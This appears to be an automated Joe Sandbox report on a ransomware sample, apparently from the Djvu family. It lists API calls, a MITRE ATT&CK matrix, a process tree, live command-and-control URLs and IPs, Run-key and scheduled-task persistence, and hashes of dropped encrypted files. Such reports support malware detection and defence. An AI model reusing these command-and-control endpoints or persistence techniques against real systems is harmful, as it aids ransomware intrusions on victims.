              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,4_2_00E6834F
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,4_2_00E68423
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: EnumSystemLocalesW,4_2_00E687C8
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: GetLocaleInfoW,4_2_00E6884E
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,4_2_00E67BB3
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,4_2_00E67E83
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: EnumSystemLocalesW,4_2_00E67E27
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,4_2_00E67F83
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,4_2_00E67F00
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00492283 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00492283
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00479F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_0048FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0048FE47
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact | Resource Development | Reconnaissance
              Valid Accounts3
              Native API
              1
              Registry Run Keys / Startup Folder
              11
              Process Injection
              1
              Deobfuscate/Decode Files or Information
              OS Credential Dumping2
              System Time Discovery
              1
              Taint Shared Content
              11
              Archive Collected Data
              Exfiltration Over Other Network Medium2
              Ingress Tool Transfer
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization2
              Data Encrypted for Impact
              Acquire InfrastructureGather Victim Identity Information
              Default Accounts3
              Command and Scripting Interpreter
              1
              Services File Permissions Weakness
              1
              Registry Run Keys / Startup Folder
              2
              Obfuscated Files or Information
              LSASS Memory1
              Account Discovery
              Remote Desktop Protocol1
              Screen Capture
              Exfiltration Over Bluetooth21
              Encrypted Channel
              SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
              Domain AccountsAtLogon Script (Windows)1
              Services File Permissions Weakness
              1
              Masquerading
              Security Account Manager2
              File and Directory Discovery
              SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
              Non-Application Layer Protocol
              Data Encrypted for ImpactDNS ServerEmail Addresses
              Local AccountsCronLogin HookLogin Hook21
              Virtualization/Sandbox Evasion
              NTDS24
              System Information Discovery
              Distributed Component Object ModelInput CaptureTraffic Duplication13
              Application Layer Protocol
              Data DestructionVirtual Private ServerEmployee Names
              Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Process Injection
              LSA Secrets1
              Query Registry
              SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
              Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Services File Permissions Weakness
              Cached Domain Credentials51
              Security Software Discovery
              VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
              External Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync21
              Virtualization/Sandbox Evasion
              Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
              Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
              Process Discovery
              Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
              Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
              Supply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
              System Network Configuration Discovery
              Shared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses
              Behavior Graph ID: 1375050, Sample: 3485f3cbe491a8770a5f05f4cfc..., Startdate: 16/01/2024, Architecture: WINDOWS, Score: 100
              • Node 2 (sample): DNS/IP: zexeq.com, api.2ip.ua. Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures. Started: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe (nodes 7, 12, 14 and 16).
              • Node 7 (3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe): DNS/IP: api.2ip.ua 172.67.139.220, 443, 49729, 49730 CLOUDFLARENETUS United States. Dropped: 3485f3cbe491a8770a...0af1c2e_payload.exe, PE32. Signatures: Found stalling execution ending in API Sleep call; Writes a notice file (html or txt) to demand a ransom; Writes many files with high entropy. Started: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe (node 18); icacls.exe (node 23).
              • Node 12 (3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe): Dropped: C:\Users\user\_readme.txt, ASCII; C:\Users\user\Desktop37WTVCDUMOB.pdf, data. Signature: Modifies existing user documents (likely ransomware behavior).
              • Node 18 (3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe): DNS/IP: zexeq.com 175.119.10.231, 49732, 49733, 49735 SKB-ASSKBroadbandCoLtdKR Korea Republic of. Dropped: C:\Users\user\...\wctF86A.tmp.ppvw (copy), MS-DOS; C:\Users\user\...\wctF411.tmp.ppvw (copy), data; C:\Users\user\...\wctEA40.tmp.ppvw (copy), data; 42 other files (39 malicious). Signatures: Infects executable files (exe, dll, sys, html); Modifies existing user documents (likely ransomware behavior).

Source | Detection | Scanner | Label
3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe | 100% | Avira | HEUR/AGEN.1319085
3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe | 100% | Joe Sandbox ML |
              No Antivirus matches
Source | Detection | Scanner | Label
http://www.wikipedia.com/ | 0% | URL Reputation | safe
https://we.tl/t-eyUsqpKb | 0% | Avira URL Cloud | safe
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error | 0% | Avira URL Cloud | safe
https://we.tl/t-eyUsqpKb0so | 0% | Avira URL Cloud | safe
https://we.tl/t-eyUsqpKbFl | 0% | Avira URL Cloud | safe
http://zexeq.com/test2/get.php?pid=F8AFCDC4E | 100% | Avira URL Cloud | malware
https://we.tl/t-eyUsqpKbt | 0% | Avira URL Cloud | safe
http://zexeq.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 | 100% | Avira URL Cloud | malware
http://zexeq.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true | 100% | Avira URL Cloud | malware
http://zexeq.com/test2/get.php | 100% | Avira URL Cloud | malware
http://zexeq.com/test2/get.phpp | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.2ip.ua | 172.67.139.220 | true | false | | high
zexeq.com | 175.119.10.231 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://zexeq.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true | true | Avira URL Cloud: malware | unknown
http://zexeq.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 | true | Avira URL Cloud: malware | unknown
https://api.2ip.ua/geo.json | false | | high
http://zexeq.com/test2/get.php | true | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.139.220 | api.2ip.ua | United States | 13335 | CLOUDFLARENETUS | false
175.119.10.231 | zexeq.com | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true
Joe Sandbox version: 38.0.0 Ammolite
Analysis ID: 1375050
Start date and time: 2024-01-16 00:40:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
Detection: MAL
Classification: mal100.rans.spre.troj.evad.winEXE@8/1287@4/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 98
• Number of non-executed functions: 228
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadFile calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Report size getting too big, too many NtWriteFile calls found.
• VT rate limit hit for: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
Time | Type | Description
00:41:25 | API Interceptor | 1x Sleep call for process: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe modified
23:40:58 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe" --AutoStart
23:40:59 | Task Scheduler | Run new task: Time Trigger Task path: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe s>--Task
23:41:06 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe" --AutoStart
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.139.220 | 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe | malicious | Babuk, Djvu, Vidar |
172.67.139.220 | bl24U4LzC9.exe | malicious | Babuk, Djvu |
172.67.139.220 | UpS8Qm873s.exe | malicious | Babuk, Djvu, Vidar |
172.67.139.220 | g0Zq7nJjus.exe | malicious | Babuk, Djvu, Vidar |
172.67.139.220 | E0tabE4K4r.exe | malicious | Babuk, Djvu, Vidar |
172.67.139.220 | jcI5FpXDUM.exe | malicious | Babuk, Djvu |
172.67.139.220 | Fl8SpyW6nf.exe | malicious | Babuk, Djvu |
172.67.139.220 | LwQAIksp2s.exe | malicious | Babuk, Djvu |
172.67.139.220 | file.exe | malicious | Babuk, Djvu |
172.67.139.220 | kOVwcHSfrR.exe | malicious | Babuk, Djvu, Vidar |
172.67.139.220 | file.exe | malicious | Babuk, Djvu |
172.67.139.220 | buildz.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar |
172.67.139.220 | Mk7woAn6lz.exe | malicious | Babuk, Djvu |
172.67.139.220 | XrNOw4sxMG.exe | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Vidar |
172.67.139.220 | file.exe | malicious | Babuk, Djvu |
172.67.139.220 | buildz.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar |
172.67.139.220 | New_Text_Document_mod.exse.exe | malicious | AgentTesla, Amadey, Creal Stealer, Djvu, FormBook, Glupteba, GuLoader |
172.67.139.220 | CUO2hN8U9N.exe | malicious | Djvu |
172.67.139.220 | file.exe | malicious | Babuk, Djvu |
172.67.139.220 | file.exe | malicious | Babuk, Djvu |
175.119.10.231 | Mnw1ycGC86.exe | malicious | LummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, Vidar | ftpvoyager.cc/ftp/index.php
175.119.10.231 | XVhd1HsCnE.exe | malicious | SmokeLoader | trunk-co.ru/tmp/index.php
175.119.10.231 | LwQAIksp2s.exe | malicious | Babuk, Djvu | habrafa.com/files/1/build3.exe
175.119.10.231 | file.exe | malicious | LummaC, BazaLoader, LummaC Stealer, SmokeLoader | gxutc2c.com/tmp/index.php
                                                                                                                          pgSw1dOHLD.exeGet hashmaliciousAmadeyBrowse
                                                                                                                          • cbinr.com/forum/index.php
                                                                                                                          UiS7Aq9P48.exeGet hashmaliciousAmadeyBrowse
                                                                                                                          • cbinr.com/forum/index.php
                                                                                                                          file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                          • cbinr.com/forum/index.php
                                                                                                                          iXRnZTjkko.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                          • humydrole.com/tmp/index.php
                                                                                                                          Zvxlbtaw4Z.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, zgRATBrowse
                                                                                                                          • humydrole.com/tmp/index.php
                                                                                                                          file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                          • humydrole.com/tmp/index.php
                                                                                                                          file.exeGet hashmaliciousGlupteba, RedLine, SmokeLoaderBrowse
                                                                                                                          • ftpvoyager.cc/ftp/index.php
                                                                                                                          file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                          • humydrole.com/tmp/index.php
                                                                                                                          file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                          • humydrole.com/tmp/index.php
                                                                                                                          file.exeGet hashmaliciousDanaBot, SmokeLoaderBrowse
                                                                                                                          • humydrole.com/tmp/index.php
                                                                                                                          file.exeGet hashmaliciousRedLine, SmokeLoader, Stealc, VidarBrowse
                                                                                                                          • humydrole.com/tmp/index.php
                                                                                                                          file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                          • humydrole.com/tmp/index.php
                                                                                                                          file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                          • humydrole.com/tmp/index.php
                                                                                                                          file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                          • dpav.cc/tmp/
                                                                                                                          93e0099a.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                          • dpav.cc/tmp/
                                                                                                                          file.exeGet hashmaliciousDarkTortilla, Djvu, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader, VidarBrowse
                                                                                                                          • pocketvpn.cc/ufc/index.php
Match, Associated Sample Name / URL, SHA 256, Detection, Threat Name, Link, Context
                                                                                                                          Your purchase Payment - DBVNAOWF (57.9 KB).msgGet hashmaliciousUnknownBrowse
                                                                                                                          • 104.17.25.14
                                                                                                                          No context
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):42
                                                                                                                          Entropy (8bit):4.8505343870129645
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:PtyVIXJzO5qADsv:FJq5PDO
                                                                                                                          MD5:D229BD468AF932365D9C5DB9B29E3284
                                                                                                                          SHA1:0C009D4D0367A707473EC08572ED86464DBE3419
                                                                                                                          SHA-256:1A35FE967A0AC4F3281C947CD550DC23FD6928556A27BD870312645820146846
                                                                                                                          SHA-512:BF28632BDDD6CB0CC2062C5A9315481E3F79BB04EC68908BF7134BA054A3D8326B44400683158054CCFDADF83923CFC217FE6B7717A4BAC7BFCF341E5E8CDBD2
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1..
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):626
                                                                                                                          Entropy (8bit):7.653345887307804
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:ksnePOFCbFv2V5VSkLwCMKhGudvBDuyW8rnM+rFi0XJeFlK1+Sq5bTcii9a:PFCbkLSkxPDuyzTe0oLK1GbD
                                                                                                                          MD5:F38D21AE76EA7E90F4887FB5ED5AE1D3
                                                                                                                          SHA1:C4AB8B40FF0893571A7F148271AC4ED83EACE4E1
                                                                                                                          SHA-256:92ED010F28799B51B22F4A1F47D84A0A948AD4985CBD65BD4ABD518ECD40D25A
                                                                                                                          SHA-512:E88780FAB77ED74AC1270018B2BB1F96CCFF599142D16199EEC30EF2F011FDD2A330DFC62EC4EC111830282A877229E874E4BBDD7105C1E14FC7F9B2C4DD8403
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):670
                                                                                                                          Entropy (8bit):7.650292250340842
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:k/GhFDNR4N+Zr+rtoCyjgP3d1heqFq52mN9264kF1cL3F6q5bTcii9a:WG7jdCrOcdeqFbm0kF1cjF/bD
                                                                                                                          MD5:BE2021B4010F5C28BFDD49E7F161ADCB
                                                                                                                          SHA1:333F5EDDB55E0856F997ABA223DE298F1977C98C
                                                                                                                          SHA-256:61AE516FD3C33AD2FFA6BC23DCA4C9D01FBADD03B3DA7688586F88BC7C1EB89C
                                                                                                                          SHA-512:1A370314343E7086A1450A122D8095F82B71B1BCE44BEE231818AD227BCCF77529E50127B1D1B9B02D2D08DC1E7EDBFF217F7F8889E50ED17BB53CF86CC9EDF9
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):818
                                                                                                                          Entropy (8bit):7.727530910454046
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:YKWQ1D9qNJNXGkaVOwH3WervgtBNE9TbD:Ye1D8UdooSU9HD
                                                                                                                          MD5:89088D876F6981B534D55E7085DC9987
                                                                                                                          SHA1:C894415106E69CB1FB39E72EBC2F7AFACF9CA646
                                                                                                                          SHA-256:5BA281ED4E219CBA6389CD1CDF6B0E759799F21B67FDDA2C061906AD2E68271D
                                                                                                                          SHA-512:E3ABA14A3FE6EC5CCC7E70C94949E0DC1C44DF976008C485E9EB2FFC932C8ABE11BE66865CE3E5EC7AC78D58D69751DA82100042BC212FFD2416FF39BC95B277
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4168
                                                                                                                          Entropy (8bit):7.953060400122653
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:zzVHFD82kpc7BMrKHsYqJjObtTeazWmkpvGhg/kDjeq7dCA4I2cjjTW:tlD82kWUKMpJjObtTmvvGaKp+I2yjTW
                                                                                                                          MD5:E3B2B96312D90B8CBEE0527322AFA320
                                                                                                                          SHA1:402612655D9CE87DE645064E56F96C453620CDD3
                                                                                                                          SHA-256:4F9BA5DA0591E47FA70F0A41472CBEA681863DC4E6EB233BEDBCF6D8503006BD
                                                                                                                          SHA-512:4BADACBA7AC568841A8FE9C8C346CA2E5AC9F4F63480D4C2CF49088D6A3DC059EA607D63024B7283DDFA568DA7D6B244E825AFF5CEC5F5DF2B3A0659BCDA000B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4168
                                                                                                                          Entropy (8bit):7.953060400122653
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:zzVHFD82kpc7BMrKHsYqJjObtTeazWmkpvGhg/kDjeq7dCA4I2cjjTW:tlD82kWUKMpJjObtTmvvGaKp+I2yjTW
                                                                                                                          MD5:E3B2B96312D90B8CBEE0527322AFA320
                                                                                                                          SHA1:402612655D9CE87DE645064E56F96C453620CDD3
                                                                                                                          SHA-256:4F9BA5DA0591E47FA70F0A41472CBEA681863DC4E6EB233BEDBCF6D8503006BD
                                                                                                                          SHA-512:4BADACBA7AC568841A8FE9C8C346CA2E5AC9F4F63480D4C2CF49088D6A3DC059EA607D63024B7283DDFA568DA7D6B244E825AFF5CEC5F5DF2B3A0659BCDA000B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):658
                                                                                                                          Entropy (8bit):7.687192035071529
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:koJgkkgbZEFNqCYClq1pX0KlaL47JY/m+JAJ673idUM2uYhevtCbfkRuXqaBEuJe:xJUO6FJADU/m+OJ6mWBuY2I/v+cMbD
                                                                                                                          MD5:F411BD776000583B2A8CA4D68C736796
                                                                                                                          SHA1:8BB57A22B7A895EAADACF8828AF92B478094ECC3
                                                                                                                          SHA-256:0D09914A043B506A02206A4FCF0D445C84F7870086CBAF18A9807C7A065FFCA9
                                                                                                                          SHA-512:D38C4C64B0FEDEB8CFF5E2D99FFA76AF2849AFEA2BD02784B8034D3365F7BAD0D97623CD1FA09E1E2E49F17653CD52975C08D99B8A3707A13CAB76ACEEF8B5EE
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):658
                                                                                                                          Entropy (8bit):7.687192035071529
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:koJgkkgbZEFNqCYClq1pX0KlaL47JY/m+JAJ673idUM2uYhevtCbfkRuXqaBEuJe:xJUO6FJADU/m+OJ6mWBuY2I/v+cMbD
                                                                                                                          MD5:F411BD776000583B2A8CA4D68C736796
                                                                                                                          SHA1:8BB57A22B7A895EAADACF8828AF92B478094ECC3
                                                                                                                          SHA-256:0D09914A043B506A02206A4FCF0D445C84F7870086CBAF18A9807C7A065FFCA9
                                                                                                                          SHA-512:D38C4C64B0FEDEB8CFF5E2D99FFA76AF2849AFEA2BD02784B8034D3365F7BAD0D97623CD1FA09E1E2E49F17653CD52975C08D99B8A3707A13CAB76ACEEF8B5EE
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):440
                                                                                                                          Entropy (8bit):7.451606576534451
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:r86fxXX30MIPlYfPeYvWo+Kb6ipo260tfrq5bTcii9a:IaZX3U0eYvWolb5pb60VebD
                                                                                                                          MD5:F58C92EC5FC4185AB3355808DF8E614E
                                                                                                                          SHA1:E2FD2DA0D00421DE9DEC0C260D3D9F6EFD402781
                                                                                                                          SHA-256:A81944184ACF767561E316E28B3BA8F7F1FCA5929313EF356DAA4C96B3185C62
                                                                                                                          SHA-512:6ECD5885E64D39859711EF4C0A31BB8B41101D6321613E2D1D014A5797869279134BF6FE2633B2EDBE75ED4D02D33AFF865922ADA8891BBDFA219C7F5C7AF0B3
